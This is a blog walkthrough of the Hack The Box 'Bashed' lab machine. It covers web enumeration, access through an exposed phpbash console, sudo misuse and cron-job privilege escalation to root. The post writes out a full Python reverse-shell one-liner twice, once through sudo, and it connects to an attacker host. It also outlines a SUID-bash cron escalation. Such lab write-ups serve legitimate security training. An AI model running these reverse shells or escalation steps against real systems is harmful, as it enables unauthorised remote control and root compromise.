CTF Walkthroughs, Hack The Box

Hack The Box – Bashed Walkthrough

November 8, 2021 | by Stefano Lanaro | Leave a comment

Introduction

This was an easy Linux machine that involved exploiting a PHP bash shell to gain initial access, misconfigured Sudo rules to escalate to the “scriptmanager” user and a cron job to escalate to root.

Enumeration

The first thing to do is to run a TCP Nmap scan against the 1000 most common ports, and using the following flags:

  • -sC to run default scripts
  • -sV to enumerate applications versions

The scan has only identified port 80 (HTTP) as open.

Enumerating HTTP

When accessing the web server through a browser, the following page is displayed:

The next step is to run a scan to find hidden files or directories using Gobuster, with the following flags:

  • dir to specify the scan should be done against directories and files
  • -u to specify the target URL
  • -w to specify the word list to use

The scan has identified a few interesting entries, one of which being /dev. When visiting it, directory listing is enabled and a few PHP files are displayed:

When accessing the “phpbash.php” file, this takes to what looks like a Bash prompt:

It also seems to function much in the same way as an actual Bash shell:

All that is left now is to obtain a shell.

The next step is to set up a Netcat listener, which will catch the reverse shell when it is executed by the victim host, using the following flags:

  • -l to listen for incoming connections
  • -v for verbose output
  • -n to skip the DNS lookup
  • -p to specify the port to listen on

A Python reverse shell can then be executed on the PHP Bash prompt:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.14.14",443));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"])'

A reverse shell as the www-data user is then returned:

Local Enumeration

When executing sudo -l, it appears that the current user can execute all commands as the “scriptmanager” user:

Quickly testing this with the id command to ensure remote command execution is possible:

sudo -u scriptmanager id

The same Python reverse shell used earlier can then be used again as the scriptmanager user:


sudo -u scriptmanager python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.14.14",443));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"])'

Privilege Escalation

When enumerating for files and folders owned by the scriptmanager user, an unusual “/scripts” folder is present:

find / -xdev -type f -user scriptmanager 2>/dev/null; find -xdev -type d -user scriptmanager 2>/dev/null

A “test.py” script can be found, which currently opens the “test.txt” file and writes “testing 123!” to it:

Since the test.txt file edited by the script is owned by root, this probably means the script itself is being executed as root, probably by a corn job.

Locally creating a Python script that will create a SUID binary of bash:

Transferring it to the target host using the Python Simple HTTP Server and Wget, therefore replacing the original one:

After a minute or so, the cron job has run and has created the “stef” SUID copy of BASH:

After executing it with the -p flag, which allows to execute binaries as the owner of it, this grants root access to the host:

This has now granted root-level access to the target machine.

Conclusion

Although this box is quite trivial it does a great show at showing some of the most common vulnerabilities and misconfiguration, such as administrative consoles and corn jobs.